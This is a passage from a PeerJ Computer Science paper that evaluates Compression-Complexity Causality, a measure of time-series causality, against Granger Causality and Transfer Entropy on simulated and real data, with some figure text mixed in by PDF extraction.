displayed represent the mean over 50 trials. As the degree of coupling is varied for AR processes, there is no clear pattern in KL and JSD values. CCC values increase in the positive direction as expected for increasing coupling, signifying that the dynamical influence from Y to X is similar to the influence on X from its own past. Also, when we took larger number of trials for AR, the values obtained by KL and JSD become confined to a smaller range and seem to converge towards a constant value indicating that the distributions of X and Y are quite similar. However, in case of coupled tent maps (both linear and non-linear coupling), as coupling is increased, the divergence between the distributions of the two coupled processes increases, indicating that their distributions are becoming very different. The values of CCC grow in the negative direction showing that with increasing coupling the independent process Y has a very different dynamical influence on X compared to X’s own past. Subsequently, due to the synchronization of Y and X, KL, JSD as well as CCC become zero. With these graphs, it may not be possible to find a universal threshold for the absolute values of KL/JSD above which CCC will show negative sign. However, if the distributions of the two coupled processes exhibit an increasing divergence (when the coupling parameter is varied) then it does indicate that the independent process would have a very different dynamical influence on the dependent one when compared with that of the dependent process’ own past, suggesting that the value of CCC will grow in the negative direction. The fact that KL/JSD and CCC do not have a one-to-one correspondence is because the former (KL and JSD) operate on first order distributions while the latter (CCC) is able to capture higher-order dynamical influences between the coupled processes. For non-stationary processes, our Kathpalia et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.196 9/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.196#supplemental-information http://dx.doi.org/10.7717/peerj-cs.196 0 0.2 0.4 0.6 0.8 1 0.1 0.15 0.2 0.25 S ym m e tr ic K L (a) 0 0.2 0.4 0.6 0.8 1 0.015 0.02 0.025 0.03 JS D (b) 0 0.2 0.4 0.6 0.8 1 0 0.05 0.1 C C C (c) Figure 1 Mean values of divergence between distributions of coupled AR(1) processes using Symmetric Kullback–Leibler (KL) (A) and Jensen Shannon (JSD) divergences (in nats) (B), and the mean causality values estimated using CCC from Y to X (solid line-circles, black) and X to Y (solid line-crosses, magenta), as the degree of coupling, � is varied (C). CCC values increase with increasing �. There is no similarity in the trend of KL/JSD to CCC. Full-size DOI: 10.7717/peerjcs.196/fig-1 0 0.2 0.4 0.6 0.8 1 0 0.2 0.4 S ym m e tr ic K L (a) 0 0.2 0.4 0.6 0.8 1 0 0.02 0.04 0.06 JS D (b) 0 0.2 0.4 0.6 0.8 1 -0.02 -0.01 0 0.01 C C C (c) Figure 2 Mean values of divergence between distributions of linearly coupled tent maps using Symmetric Kullback Leibler (KL) (A) and Jensen Shannon (JSD) divergences (in nats) (B), and the mean causality values estimated using CCC from Y to X (solid line-circles, black) and X to Y (solid line-crosses, magenta) (C), as the degree of coupling, � is varied. For � < 0.5, CCC and KL/JSD are highly negatively correlated. Full-size DOI: 10.7717/peerjcs.196/fig-2 measure would still be able to capture the kind of dynamical influence, though distributions are not static. Both positive and negative CCC imply significant causal influence (CCC≈0 implies either no causal influence or identical processes), but the nature of the dynamical influence of the cause on the effect is very different in these two cases. Causality turning ‘negative’ does not seem very intuitive at first, but all that it signifies is that the past of the cause variable makes the dynamics of the effect variable less predictable than its (effect’s) own past. Such a unique feature could be very useful for real world applications in terms of ‘controlling’ the dynamics of a variable being effected by several variables. If a particular cause, out of several causes that makes the caused ‘less predictable’ and has ‘intrinsically different’ dynamics from that of the effect, needs to be determined and eliminated, it can be readily identified by observing the sign of CCC. Informed attempts to inhibit and enforce certain variables of the system can then be made. As the existing model-free methods of causality can extract only ‘associational causality’ and ignore the influence that the cause has on dynamics of the caused, it is impossible for them to comment on the nature of this dynamical influence, something that CCC is Kathpalia et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.196 10/24 https://peerj.com https://doi.org/10.7717/peerjcs.196/fig-1 https://doi.org/10.7717/peerjcs.196/fig-2 http://dx.doi.org/10.7717/peerj-cs.196 uniquely able to accomplish. Obviously, model based methods give full-fledged information about ‘the kind of dynamical influence’ owing to the model equations assumed. However, if there are no equations assumed (or known), then the sign and magnitude of CCC seems to be the best choice to capture the cause–effect relationship with additional information on the similarity (or its lack of) between the two dynamics. RESULTS AND DISCUSSION A measure of causality, to be robust for real data, needs to perform well in the presence of noise, filtering, low temporal and amplitude resolution, non-uniformly sampled signals, short length time series as well as the presence of other causal variables in the system. In this section, we rigorously simulate these cases and evaluate the performance of CCC measure by comparing with existing measures—Granger Causality (GC) and Transfer Entropy (TE). Owing to space constraints, some of these results are included in Section S4. In the last sub-section, we test CCC on real-world datasets. In all cases, we take the averaged value of CCC over entire time series as computed by Eq. (8) (or Eq. (11) in the conditional case) and the parameters for CCC estimation are chosen as per the selection criteria and rationale discussed in Section S3. GC estimation is done using the MVGC toolbox (Barnett & Seth, 2014) in its default settings and TE estimation is done using MuTE toolbox (Montalto, Faes & Marinazzo, 2014). Akaike Information Criteria is used for model order estimation with the maximum model order set to 20 in the MVGC toolbox, except where specified. The maximum number of lags to take for autocorrelation computation is done automatically by the toolbox. In the MuTE toolbox, the approach of Non Uniform Embedding for representation of the history of the observed processes and of Nearest Neighbor estimator for estimating the probability density functions is used for all results in this paper. The number of lags to consider for observed processes was set to 5 and the maximum number of nearest neighbors to consider was set to 10. Varying unidirectional coupling AR(1) Autoregressive processes of order one (AR(1)) were simulated as follows. X and Y are the dependent and independent processes respectively. X(t)=aX(t−1)+�Y (t−1)+εX,t (15) Y (t) =bY (t−1)+εY,t, where a=0.9, b=0.8, t =1 to 1,000s, sampling period = 1s. � is varied from 0−0.9 in steps of 0.1. Noise terms, εY,εX =νη, where ν = noise intensity = 0.03 and η follows standard normal distribution. Figure 3 shows the performance of CCC along with that of TE and GC as mean values over 50 trials, (CCC settings: L=150, w =15, δ=80, B=2). Standard deviation of CCC, TE and GC values are shown in Fig. 4. With increasing coupling, the causality estimated by CCC, TE as well as GC increases. Kathpalia et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.196 11/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.196#supplemental-information http://dx.doi.org/10.7717/peerj-cs.196#supplemental-information http://dx.doi.org/10.7717/peerj-cs.196 0 0.2 0.4 0.6 0.8 1 0 0.04 0.08 0.12 C C C (a) 0 0.2 0.4 0.6 0.8 1 0 0.1 0.2 0.3 T E (b) 0 0.2 0.4 0.6 0.8 1 0 0.5 1 G C (c) Figure 3 Mean causality values estimated using CCC (A), TE (B) and GC (C) for coupled AR(1) pro- cesses, from Y to X (solid line-circles, black) and X to Y (solid line-crosses, magenta) as the degree of coupling, � is varied. CCC, TE as well as GC are able to correctly quantify causality. Full-size DOI: 10.7717/peerjcs.196/fig-3 0 0.2 0.4 0.6 0.8 1 0 0.02 0.04 S td . d e v. C C C (a) 0 0.2 0.4 0.6 0.8 1 0 0.02 0.04 S td . d e v. T E (b) 0 0.2 0.4 0.6 0.8 1 0 0.02 0.04 S td . d e v. G C (c) Figure 4 Standard deviation of causality values estimated using CCC (A), TE (B) and GC (C) for cou- pled AR(1) processes, from Y to X (solid line-circles, black) and X to Y (solid line-crosses, magenta) as the degree of coupling, � is varied. Full-size DOI: 10.7717/peerjcs.196/fig-4 AR(100) Autoregressive processes of order hundred (AR(100): X dependent, Y independent) were simulated as follows. X(t)=aX(t−1)+�Y (t−100)+εX,t Y (t)=bY (t−1)+εY,t, (16) where a=0.9, b=0.8, t =1 to 1,000s, sampling period = 1s. � is varied from 0−0.9 in steps of 0.1. Noise terms, εY,εX =νη, where ν = noise intensity = 0.03 and η follows standard normal distribution. Figure 5 shows the performance of CCC along with that of TE and GC, as mean values over 50 trials (CCC settings: L=150, w =15, δ=80, B=2). Maximum model order was set to 110 in the MVGC toolbox. CCC values increase steadily with increasing coupling for the correct direction of causation. TE fails as it shows higher causality from X to Y for all �. GC also shows confounding of causality values in two directions. Thus, causality in coupled AR processes with long-range memory can be reliably estimated using CCC and not using TE or GC. Range of standard deviation of CCC values from Y to X is 0.0076 to 0.0221 for varying parameter � and that from X to Y is 0.0039 to 0.0053. These values are much smaller than the mean CCC estimates and thus, causality estimated in the direction of causation and opposite to it remain well separable. For TE, Y to X, standard deviation range is 0.0061 to Kathpalia et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.196 12/24 https://peerj.com https://doi.org/10.7717/peerjcs.196/fig-3 https://doi.org/10.7717/peerjcs.196/fig-4 http://dx.doi.org/10.7717/peerj-cs.196 0 0.2 0.4 0.6 0.8 1 0 0.04 0.08 0.12 C C C (a) 0 0.2 0.4 0.6 0.8 1 2 4 6 8 T E 10 -3 (b) 0 0.2 0.4 0.6 0.8 1 0 2 4 G C 10 -3 (c) Figure 5 Mean causality values estimated using CCC (A), TE (B) and GC (C) for coupled AR(100) pro- cesses, from Y to X (solid line-circles, black) and X to Y (solid line-crosses, magenta) as the degree of coupling, � is varied. Only CCC is able to reliably estimate the correct causal relationship for all values of � while TE and GC fail. Full-size DOI: 10.7717/peerjcs.196/fig-5 0.0090 and X to Y , standard deviation range is 0.0082 to 0.0118. For GC, Y to X, standard deviation range is 0.0012 to 0.0033 and X to Y , standard deviation range is 0.0015 to 0.0034. Tent map Linearly coupled tent maps were simulated as per the following equations. Independent process, Y , is generated as: Y (t)=2Y (t−1), 0≤Y (t−1)<1/2, (17) Y (t)=2−2Y (t−1), 1/2≤Y (t−1)≤1. The linearly coupled dependent process, X, is as below: X(t)= �Y (t)+(1−�)h(t), (18) h(t) =2X(t−1), 0≤X(t−1)<1/2, h(t) =2−2X(t−1), 1/2≤X(t−1)≤1, where � is the degree of linear coupling. The length of the signals simulated in this case was 3,000, i.e., t =1 to 3,000s, sampling period = 1s and the first 2,000 transients were removed to yield 1,000 points for causality estimation. Figure 6 shows the performance of CCC and TE for linearly coupled tent maps as � is varied (CCC settings: L=100, w =15, δ=80, B=8). CCC and TE comparison was also done for increasing coupling in the case of non-linearly coupled tent maps. These results are included in the Section S4.1. Results obtained are similar to the linear coupling case. The assumption of a linear model for estimation of GC was proved to be erroneous for most trials and hence GC values are not displayed. As � is increased for both linear and non-linear coupling, TEY→X increases in the positive direction and then falls to zero when the two series become completely synchronized at �=0.5. The trend of the magnitude of CCC values is similar to TE, however, CCCY→X increment is in the negative direction. This is because of the fact that with increasing coupling the kind of dynamical influence Kathpalia et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.196 13/24 https://peerj.com https://doi.org/10.7717/peerjcs.196/fig-5 http://dx.doi.org/10.7717/peerj-cs.196#supplemental-information http://dx.doi.org/10.7717/peerj-cs.196 0 0.2 0.4 0.6 0.8 1 -20 -15 -10 -5 0 C C C 10 -3 (a) 0 0.2 0.4 0.6 0.8 1 0 0.5 1 1.5 T E (b) Figure 6 Mean of causality values estimated using CCC (A) and TE (B) for linearly coupled tent maps, from Y to X (solid line-circles, black) and X to Y (solid line-crosses, magenta) as the degree of cou- pling is increased. With increasing coupling (until synchronization), magnitude of CCC and TE values in- creases. CCC values are negative while TE are positive. Full-size DOI: 10.7717/peerjcs.196/fig-6 from Y to X becomes increasingly different than the dynamical influence from the past values of X to itself. In case of linear coupling, range of standard deviation of CCC values from Y to X is 0.0050 to 0.0087 for different values of � and that from X to Y is 0.0051 to 0.0100. For TE, Y to X, standard deviation range is 0 to 1.4851 and X to Y , standard deviation range is 0 to 1.4225. For non-linear coupling, the range of standard deviation values are included in Section S4.1. For both CCC and TE, standard deviation values obtained indicate that there might be confounding in the causality values in the direction of causation and the direction opposite to causation for low values of �. Varying process noise The performance of measures as process noise is varied is shown in Fig. 7 for coupled AR processes simulated as in Eq. (15), where a=0.9, b=0.8, �=0.8, t =1 to 1,000s, sampling period=1s, number of trials=50. Noise terms, εY,εX =νη, where ν =noise intensity, is varied from 0.01 to 0.1 and η follows standard normal distribution. CCC settings: L=150, w =15, δ=80, B=2. The range of standard deviation of CCC values from Y to X is 0.0162 to 0.0223 for different values of � and that from X to Y is 0.0038 to 0.0058. For TE, Y to X, standard deviation range is 0.0182 to 0.0267 and X to Y , standard deviation range is 0.0063 to 0.0104. For GC, Y to X, standard deviation range is 0.0314 to 0.0569 and X to Y , standard deviation range is 0.0001 to 0.0002. The performance of all three measures is fairly good in this case. Only GC values show a slightly increasing trend with increasing noise intensity. Non uniform sampling Results for causality testing on uniformly downsampled signals are included in the Section S4.2. Non-uniformly sampled/non-synchronous measurements are common in real- world physiological data acquisition due to jitters/motion-artifacts as well as due to the inherent nature of signals such as heart rate signals (Laguna, Moody & Mark, 1998). Also, in Kathpalia et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.196 14/24 https://peerj.com https://doi.org/10.7717/peerjcs.196/fig-6 http://dx.doi.org/10.7717/peerj-cs.196#supplemental-information http://dx.doi.org/10.7717/peerj-cs.196#supplemental-information http://dx.doi.org/10.7717/peerj-cs.196#supplemental-information http://dx.doi.org/10.7717/peerj-cs.196 0 0.02 0.04 0.06 0.08 0.1 0 0.04 0.08 0.12 C C C (a) 0 0.02 0.04 0.06 0.08 0.1 0 0.1 0.2 0.3 T E (b) 0 0.02 0.04 0.06 0.08 0.1 0 0.3 0.6 0.9 G C (c) Figure 7 Mean causality values estimated using CCC (A), TE (B) and GC (C) for coupled AR processes, from Y to X (solid line-circles, black) and X to Y (solid line-crosses, magenta) as the intensity of noise, ν is varied. All the three measures perform well in this case. Full-size DOI: 10.7717/peerjcs.196/fig-7 0 10 20 30 40 0 0.05 0.1 C C C (a) 0 10 20 30 40 0 0.1 0.2 0.3 T E (b) 0 10 20 30 40 0 0.5 1 G C (c) Figure 8 Mean causality values estimated using CCC (A), TE (B) and GC (C) for coupled AR processes from Y to X (solid line-circles, black) and X to Y (solid line-crosses, magenta) as the percentage of non- uniform sampling α is varied. CCC is the only measure that shows reliable, consistent and correct esti- mates of causality. Full-size DOI: 10.7717/peerjcs.196/fig-8 economics, the case of missing data is common (Baumöhl & Vỳrost, 2010). To realistically simulate such a scenario, non-uniform sampling was introduced by eliminating data from random locations of the dependent time series and then presenting the resulting series as a set with no knowledge of the time-stamps of the missing data. The percentage of non-uniform sampling/non-synchronous measurements (α) is the percentage of these missing data points. AR processes with non-uniformly sampled signals were simulated as per Eq. (15) with b=0.7, a=0.9, �=0.8. Noise terms, εY,εX =νη, where ν = noise intensity = 0.03 and η follows standard normal distribution. Length of original time series, N =2,000, and is reduced upon increasing the percentage non-uniform sampling α. In order to match the lengths of the two time series, Y , the independent time series, is appropriately truncated to match the length of the dependent signal, X (this results in non-synchronous pair of measurements). CCC settings used: L=150, w =15, δ=80, B=2. Mean causality estimated for 10 trials using the three measures with increasing α, while ν=0.03, are shown in Fig. 8. Linearly coupled tent maps with non-uniformly sampled signals were simulated as per Eqs. (17) and (18) with �=0.3. Length of original time series, N =2000, and is reduced upon increasing the percentage non-uniform sampling α. In order to match the lengths of Kathpalia et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.196 15/24 https://peerj.com https://doi.org/10.7717/peerjcs.196/fig-7 https://doi.org/10.7717/peerjcs.196/fig-8 http://dx.doi.org/10.7717/peerj-cs.196 0 10 20 30 40 -10 -5 0 5 C C C 10 -3 (a) 0 10 20 30 40 0 0.5 1 1.5 T E (b) 0 10 20 30 40 0 0.02 0.04 0.06 G C (c) Figure 9 Mean causality values estimated using CCC (A), TE (B) and GC (C) for coupled tent maps from Y to X (solid line-circles, black) and X to Y (solid line-crosses, magenta) as the percentage of non- uniform sampling is varied. CCC is able to distinguish the causality direction but the separation between values is small. TE and GC completely fail. Full-size DOI: 10.7717/peerjcs.196/fig-9 the two time series, Y , the independent time series, is appropriately truncated to match the length of the dependent signal, X (this results in non-synchronous pair of measurements). CCC settings used: L=100, w =15, δ=80, B=8. Mean causality estimated for 10 trials using the three measures with increasing increasing α, while ν=0.03, are shown in Fig. 9. As the results clearly indicate, both TE and GC fail when applied to non-uniformly sampled coupled AR and tent map processes. CCC values are relatively invariant to non-uniform sampling and thus could be employed in such scenarios. Filtering of coupled signals Acquired data preprocessing often involves low pass filtering to smooth out the signal (Teplan, 2002). At other times, high pass filtering is required to remove low frequency glitches from a high frequency signal. Also, when the signals acquired are sampled at low frequencies, the effects due to decimation and filtering may add up and result in poorer estimates of causality. This is often the case in fMRI signals (Glover, 2011; Kim, Richter & Uurbil, 1997). To test these scenarios, AR processes were simulated as below: Y (t)=0.7Y (t−5)+εY,t, X(t)=0.9X(t−5)+0.8Y (t−1)+εX,t, (19) where, noise terms, εY,εX =νη, where ν = noise intensity = 0.03 and η follows standard normal distribution. Causality values were estimated using CCC, TE and GC when simulated signals are low pass filtered using a moving average window of length 3 with step size 1. The results are shown in Table 1 as mean values over 10 trials. CCC settings used: L=150, w =15, δ=80, B=2. The performance of the measures when coupled signals are decimated to half the sampling rate and then low pass filtered are also included in the table. The length of the original signal simulated is 2000 and is reduced to 1998 upon filtering and to 998 upon filtering and decimation. From the table, we see that CCC can distinguish the direction of causality in the original case as well as in the filtering and decimation plus filtering case. Erroneously, TE shows Kathpalia et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.196 16/24 https://peerj.com https://doi.org/10.7717/peerjcs.196/fig-9 http://dx.doi.org/10.7717/peerj-cs.196 Table 1 Mean CCC, TE and GC estimates for coupled AR processes Y (independent) and X (depen- dent) as it is, upon filtering and upon decimation and filtering. System CCC TE GC Y → X X → Y Y → X X → Y Y → X X → Y Original 0.0908 −0.0041 0.2890 0.0040 0.3776 0.0104 Filtered 0.0988 0.0018 0.2398 0.0170 0.4787 0.0056 Decimated and filtered 0.0753 0.0059 0.1270 0.0114 0.4321 0.0596 significant causality in the direction opposite to causation upon filtering as well as upon decimation and filtering and GC shows significant causality in the direction opposite to causation upon decimation and filtering. By this we can infer that CCC is highly suitable for practical applications which involve pre-processing such as filtering and decimation of measurements. Conditional CCC on short length MVAR system A system of three variables was simulated as per the following equations— Z(t)=0.8Z(t−1)+�Z,t, X(t)=0.9X(t−1)+0.4Z(t−100)+�X,t, Y (t)=0.9Y (t−1)+0.8Z(t−100)+�Y,t, (20) where the noise terms, εZ,εX,εY =νη, ν = noise intensity = 0.03 and η follows standard normal distribution. Length of time series simulated was 300 and first 50 transients were removed to yield short length signals of 250 time points. The coupling direction and strength between variables X, Y , Z are shown in Fig. 10A. The mean values of causality estimated over 10 trials using CCC, TE and GC are shown in Fig. 10 tables, (b), (c) and (d) respectively. CCC settings used: L=150, w =15, δ=20, B=2. In the tables, true positives are in green, true negatives in black, false positives in red and false negatives in yellow. CCC detects correctly the true positives and negatives. GC, detects the true positives but also shows some false positive couplings. TE, performs very poorly, falsely detecting negatives where coupling is present and also showing false positives where there is no coupling. Real Data CCC was applied to estimate causality on measurements from two real-world systems and compared with TE. System (a) comprised of short time series for dynamics of a complex ecosystem, with 71 point recording of predator (Didinium) and prey (Paramecium) populations, reported in Veilleux (1976) and originally acquired for Jost & Ellner (2000), with first 9 points from each series removed to eliminate transients (Fig. 11A). Length of signal on which causality is computed, N =62, CCC settings used: L=40, w =15, δ=4, B=8. CCC is seen to aptly capture the higher (and direct) causal influence from predator to prey population and lower influence in the opposite direction (see Fig. 11). The latter is expected, owing to the indirect effect of the change in prey population on predator. CCC Kathpalia et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.196 17/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.196 Figure 10 Mean causality values estimated using CCC (B), TE (C) and GC (D) for a system of three AR variables coupled as in (A). True positives are in green, true negatives in black, false positives in red and false negatives in yellow. Full-size DOI: 10.7717/peerjcs.196/fig-10 results are in line with that obtained using Convergent Cross Mapping (Sugihara et al., 2012). TE, on the other hand, fails to capture the correct causality direction. System (b) comprised of raw single-unit neuronal membrane potential recordings (V , in 10V) of squid giant axon in response to stimulus current (I, in V, 1V=5 µA/cm2), recorded in Paydarfar, Forger & Clay (2006) and made available by Goldberger et al. (2000). We test for the causation from I to V for three axons (1 trial each) labeled ‘a3t01’, ‘a5t01’ and ‘a7t01’, extracting 5,000 points from each recording. Length of signal on which causality is computed, N =5,000, CCC settings used: L=75, w =15, δ=50, B=2. We find that CCCI→V is less than or approximately equal to CCCV→I and both values are less than zero for the three axons (Fig. 11), indicating negative causality in both directions. This implies bidirectional dependence between I and V . Each brings a different dynamical influence on the other when compared to its own past. TE fails to give consistent results for the three axons. CONCLUSIONS In this work, we have proposed a novel data-based, model-free intervention approach to estimate causality for given time series. The Interventional Complexity Causality measure (or ICC) based on capturing causal influences from the dynamical complexities of data is formalized as Compression-Complexity Causality (CCC) and is shown to have the following strengths— • CCC operates on windows of the input time series (or measurements) instead of individual samples. It does not make any assumption of the separability of cause and effect samples. Kathpalia et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.196 18/24 https://peerj.com https://doi.org/10.7717/peerjcs.196/fig-10 http://dx.doi.org/10.7717/peerj-cs.196 Figure 11 CCC, TE on real-world time series. (A) Time series showing population of Didinium na- sutum (Dn) and Paramecium aurelia (Pn) as reported in Veilleux (1976), (B) Stimulus current (I) and voltage measurements (V ) as recorded from a Squid Giant Axon (‘a3t01’) in Paydarfar, Forger & Clay (2006). (C): Table showing CCC and TE values as estimated for systems (A) and (B). Full-size DOI: 10.7717/peerjcs.196/fig-11 • CCC doesn’t make any assumptions of stochasticity, determinism, gaussianity, stationarity, linearity or markovian property. Thus, CCC is applicable even on non-stationary/ non-linear/non-gaussian/non-markovian, short-term and long-term memory processes, as well as chaotic processes. CCC characterizes causal relationship based on dynamical complexity computed from windows of the input data. • CCC is uniquely and distinctly novel in its approach since it does not estimate ‘associational’ causality (first rung on Ladder of Causation) but performs ‘intervention’ (second rung on the Ladder of Causation) to capture causal influences from the dynamics of the data. • The point of ‘intervention’ (length L for creating the hypothetical data: Ypast +1X) is dependent on the temporal scale at which causality exists within and between processes. It is determined adaptively based on the given data. This makes CCC a highly data- driven/data-adaptive method and thus suitable for a wide range of applications. Kathpalia et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.196 19/24 https://peerj.com https://doi.org/10.7717/peerjcs.196/fig-11 http://dx.doi.org/10.7717/peerj-cs.196 • Infotheoretic causality measures such as TE and others need to estimate joint probability densities which are very difficult to reliably estimate with short and noisy time series. On the other hand, CCC uses Effort-To-Compress (ETC) complexity measure over short windows to capture time-varying causality and it is well established in literature that ETC outperforms infotheoretic measures for short and noisy data (Nagaraj & Balasubramanian, 2017a; Balasubramanian & Nagaraj, 2016). • CCC can be either positive or negative (unlike TE and GC). By this unique property, CCC gives information about the kind of causal influence that is brought by one time series on another, whether this influence is similar (CCC >0) to or different (CCC <0) from the influence that the series brings to its own present. • Negative CCC could be used for ‘control’ of processes by intervening selectively on those variables which are dissimilar (CCC <0)/similar (CCC >0) in terms of their dynamics. • CCC is highly robust and reliable, and overcomes the limitations of existing measures (GC and TE) in case of signals with long-term memory, low temporal resolution, noise, filtering, non-uniform sampling (non-synchronous measurements), finite length signals, presence of common driving variables as well as on real datasets. We have rigorously demonstrated the performance of CCC in this work. Given the above listed novel properties of CCC and its unique model-free, data-driven, data-adaptive intervention-based approach to causal reasoning, it has the potential to be applied in a wide variety of real-world applications. Future work would involve testing the measure on simulated networks with complex interactions as well as more real world datasets. We would like to further explore the idea of negative CCC and check its relation to Lyaupnov exponent (for chaotic systems) which can characterize the degree of chaos in a system. It is also worthwhile to explore the performance of other complexity measures such as Lempel–Ziv complexity for the proposed Interventional Complexity Causality. We provide free open access to the CCC MATLAB toolbox developed as a part of this work. See Section S5 for details. List of abbreviations AR Autoregressive C(· ) Complexity CC Dynamical Compression-Complexity CCC Compression-Complexity Causality CR Complexity Rate ETC(· ) Effort-to-Compress GC Granger Causality JSD Jensen–Shannon Divergence LZ Lempel–Ziv Complexity MVAR Multivariate Autoregressive C(·,· ) Joint Complexity CC Averaged Dynamical Compression-Complexity CCC Averaged Compression-Complexity Causality DC Dynamical Complexity Kathpalia et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.196 20/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.196#supplemental-information http://dx.doi.org/10.7717/peerj-cs.196 ETC(·,· ) Joint Effort-to-Compress ICC Interventional Complexity Causality KL Kullback–Leibler Divergence TE Transfer Entropy ACKNOWLEDGEMENTS Aditi Kathpalia is thankful to Manipal Academy of Higher Education for permitting this research as part of the PhD programme. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by Tata Trusts and Cognitive Science Research Initiative (CSRI- DST) Grant No. DST/CSRI/2017/54. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Tata Trusts and Cognitive Science Research Initiative (CSRI-DST): Grant No. DST/CSRI/2017/54. Competing Interests The authors declare there are no competing interests. Author Contributions • Aditi Kathpalia and Nithin Nagaraj conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. Data Availability The following information was supplied regarding data availability: In Text S1, we provide details of our proposed method Compression-Complexity Causality (CCC). The text also provides details of the MATLAB toolbox for computation of CCC, made available as Supplemental Material. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.196#supplemental-information. REFERENCES Balasubramanian K, Nagaraj N. 2016. Aging and cardiovascular complexity: effect of the length of RR tachograms. PeerJ 4:e2755 DOI 10.7717/peerj.2755. Kathpalia et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.196 21/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.196#supp-1 http://dx.doi.org/10.7717/peerj-cs.196#supplemental-information http://dx.doi.org/10.7717/peerj-cs.196#supplemental-information http://dx.doi.org/10.7717/peerj-cs.196#supplemental-information http://dx.doi.org/10.7717/peerj.2755 http://dx.doi.org/10.7717/peerj-cs.196 Barnett L, Seth AK. 2014. The MVGC multivariate Granger causality toolbox: a new approach to Granger-causal inference. Journal of Neuroscience Methods 223:50–68 DOI 10.1016/j.jneumeth.2013.10.018. Barrett AB, Barnett L. 2013. Granger causality is designed to measure effect, not mechanism. Frontiers in Neuroinformatics 7:Article 6 DOI 10.3389/fninf.2013.00006. Bauer M, Cox JW, Caveness MH, Downs JJ, Thornhill NF. 2007. Finding the direction of disturbance propagation in a chemical process using transfer entropy. IEEE Trans- actions on Control Systems Technology 15(1):12–21 DOI 10.1109/TCST.2006.883234. Baumöhl E, Vỳrost T. 2010. Stock market integration: Granger causality testing with respect to nonsynchronous trading effects. Czech Journal of Economics & Finance 60(5):414–425. Budhathoki K, Vreeken J. 2016. Causal inference by compression. In: 2016 IEEE 16th international conference on data mining (ICDM). Piscataway: IEEE, 41–50. Chiou-Wei SZ, Chen C-F, Zhu Z. 2008. Economic growth and energy consumption revisited: evidence from linear and nonlinear Granger causality. Energy Economics 30(6):3063–3076 DOI 10.1016/j.eneco.2008.02.002. Cilibrasi RL. 2007. Statistical inference through data compression. Amsterdam: Institute for Logic, Language and Computation. Cover TM, Thomas JA. 2012. Elements of information theory. Hoboken: John Wiley & Sons. Dhamala M, Rangarajan G, Ding M. 2008. Estimating Granger causality from Fourier and wavelet transforms of time series data. Physical Review Letters 100(1):018701-1–018701-4 DOI 10.1103/PhysRevLett.100.018701. Friston K, Harrison L, Penny W. 2003. Dynamic causal modelling. NeuroImage 19(4):1273–1302 DOI 10.1016/S1053-8119(03)00202-7. Glover GH. 2011. Overview of functional magnetic resonance imaging. Neurosurgery Clinics 22(2):133–139 DOI 10.1016/j.nec.2010.11.001. Goldberger AL, Amaral LA, Glass L, Hausdorff JM, Ivanov PC, Mark RG, Mietus JE, Moody GB, Peng C-K, Stanley HE. 2000. Physiobank, physiotoolkit, and physionet. Circulation 101(23):e215–e220 DOI 10.1161/01.CIR.101.23.e215. Granger C. 1969. Investigating causal relations by econometric models and cross-spectral methods. Econometrica 37(3):424–438 DOI 10.2307/1912791. Hiemstra C, Jones JD. 1994. Testing for linear and nonlinear Granger causality in the stock price-volume relation. The Journal of Finance 49(5):1639–1664. Jost C, Ellner SP. 2000. Testing for predator dependence in predator-prey dynamics: a non-parametric approach. Proceedings of the Royal Society B: Biological Sciences 267(1453):1611–1620 DOI 10.1098/rspb.2000.1186. Kim S-G, Richter W, Uǧurbil K. 1997. Limitations of temporal resolution in functional MRI. Magnetic Resonance in Medicine 37(4):631–636 DOI 10.1002/mrm.1910370427. Laguna P, Moody GB, Mark RG. 1998. Power spectral density of unevenly sampled data by least-square analysis: performance and application to heart rate signals. IEEE Transactions on Biomedical Engineering 45(6):698–715 DOI 10.1109/10.678605. Kathpalia et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.196 22/24 https://peerj.com http://dx.doi.org/10.1016/j.jneumeth.2013.10.018 http://dx.doi.org/10.3389/fninf.2013.00006 http://dx.doi.org/10.1109/TCST.2006.883234 http://dx.doi.org/10.1016/j.eneco.2008.02.002 http://dx.doi.org/10.1103/PhysRevLett.100.018701 http://dx.doi.org/10.1016/S1053-8119(03)00202-7 http://dx.doi.org/10.1016/j.nec.2010.11.001 http://dx.doi.org/10.1161/01.CIR.101.23.e215 http://dx.doi.org/10.2307/1912791 http://dx.doi.org/10.1098/rspb.2000.1186 http://dx.doi.org/10.1002/mrm.1910370427 http://dx.doi.org/10.1109/10.678605 http://dx.doi.org/10.7717/peerj-cs.196 Lempel A, Ziv J. 1976. On the complexity of finite sequences. IEEE Transactions on Information Theory 22(1):75–81 DOI 10.1109/TIT.1976.1055501. Marinazzo D, Pellicoro M, Stramaglia S. 2008. Kernel method for nonlinear Granger causality. Physical Review Letters 100(14):144103-1–144103-4 DOI 10.1103/PhysRevLett.100.144103. Montalto A, Faes L, Marinazzo D. 2014. MuTE: a MATLAB toolbox to compare established and novel estimators of the multivariate transfer entropy. PLOS ONE 9(10):e109462 DOI 10.1371/journal.pone.0109462. Mosedale TJ, Stephenson DB, Collins M, Mills TC. 2006. Granger causality of coupled climate processes: Ocean feedback on the North Atlantic Oscillation. Journal of Climate 